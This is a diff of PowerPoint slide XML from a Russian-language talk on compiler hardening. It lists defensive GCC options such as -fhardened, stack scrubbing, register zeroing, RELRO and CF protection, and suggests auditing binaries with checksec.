-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-auto-var-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>init</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=zero -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fPIE</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>Wl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>,-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>z,now</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>Wl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>,-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>z,relro</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protector-strong -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-clash-protection -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fcf</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-protection=full</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Hardening-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>защиты в критическом ПО</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Чаты, почтовые клиенты, мультимедиа, интерпретаторы, БД, офисное ПО</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>ридеры</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="Slide Number Placeholder 3">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26F0C61A-D298-401E-8D62-8688B8F32571}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldNum" sz="quarter" idx="12"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
-              <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>78</a:t>
-            </a:fld>
-            <a:endParaRPr lang="en-US"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2970358473"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -32076,7 +31792,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FBBCCBC-F667-4231-85BA-0357462E7F40}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6713E613-45DE-4720-BCF2-4F99AC6FFAD0}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -32094,7 +31810,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Заключение</a:t>
+              <a:t>О чём мы не рассказали</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -32102,10 +31818,10 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="Text Placeholder 2">
+          <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFF1E393-523C-4524-B32D-C3F28EF2422D}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF6B1F09-94BF-48D9-B780-866C5F1B0092}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -32113,15 +31829,392 @@
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
-            <p:ph type="body" idx="1"/>
+            <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr lang="en-US"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Опции для очистки секретов (паролей, ключей</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, etc.):</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>S</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>tack scrubbing – очистка</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>стека при выходе из функции (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-fstrub</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Очистка регистров при выходе из функции </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-fzero-call-used-regs</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Опции для защиты от аппаратных атак </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Spectre</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, etc.)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fhardened</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>– зонтичная</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>опция для наиболее важных защит</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Хороший дефолтный флаг, но пока реализован только в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>LLVM #122687</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включает все опции, рекомендованные </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>OpenSSF</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Конкретный набор зависит от версии компилятора </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>есть </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>--help=hardened</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Сейчас</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>ftrivial</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-auto-var-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>init</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=zero -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fPIE</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>Wl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>,-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>z,now</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>Wl</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>,-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>z,relro</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protector-strong -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fstack</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-clash-protection -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fcf</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-protection=full</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Hardening-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>защиты в критическом ПО</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Чаты, почтовые клиенты, мультимедиа, интерпретаторы, БД, офисное ПО</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>ридеры</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -32130,7 +32223,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDF60EB6-4D51-481C-9223-8D6829AF904C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26F0C61A-D298-401E-8D62-8688B8F32571}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -32157,7 +32250,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3093752828"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2970358473"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -32518,7 +32611,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{527B94E6-AC75-496A-80B4-C52365ABC84D}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FBBCCBC-F667-4231-85BA-0357462E7F40}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -32536,21 +32629,18 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Что стоит сделать </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>?</a:t>
-            </a:r>
+              <a:t>Заключение</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
+          <p:cNvPr id="3" name="Text Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{861B54C4-30F2-41AC-AD28-53F5FBB73FC4}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFF1E393-523C-4524-B32D-C3F28EF2422D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -32558,7 +32648,7 @@
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
-            <p:ph idx="1"/>
+            <p:ph type="body" idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
         <p:spPr/>
@@ -32566,106 +32656,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверить дефолтные опции при сборке продуктового кода и дистрибутива</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Решить с </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Security Team </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>какие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardening</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>-методы включить</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Поиск проблемных программ (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>no-pie, etc.) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>можно автоматизировать с помощью </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>утилиты </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>checksec</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Может проверить наличие </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>noexecstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, PIE, _FORTIFY_SOURCE, RELRO, etc.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пока </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(?) </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не поддерживает более новые защиты</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>: CFI (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>все виды</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
